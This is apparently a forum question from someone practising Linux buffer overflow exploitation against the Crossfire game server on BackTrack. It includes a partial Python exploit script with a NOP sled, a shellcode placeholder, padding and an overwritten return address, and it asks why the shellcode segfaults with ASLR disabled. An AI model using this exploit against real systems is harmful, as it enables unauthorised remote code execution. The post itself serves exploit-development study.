I am practicing linux bof exploitation. when trying to exploit a vulnerability in crossfire, everything works well and I get the shellcode placed in the right place, and the program flow gets redirected to shellcode, however, when start executing the shell code, the program fails.
OS version (bt5 R3):
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
import socket, sys
host = sys.argv
#0x8134e77 jump eax
#0xb7dadad6 nop sled address
crash = "\x90" *199 + shellcode + "\x43" * 4090 + "\xd6\xda\xda\xb7" + "D" * 7
buffer= "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
print "[*]Payload Sent !"
I placed a break point before the shellcode and the execution flow hits it successfully, however, after continuing the program crashes and gives the following message:
"Program received signal SIGSEGV, Segmentation fault.
0xb7daeb36 in ?? ()"
when inspecting this address, it's full of zeros !
I already disabled ASLR before starting the exercise and I am wondering does any other protection mechanism exist that prevents exploitation ?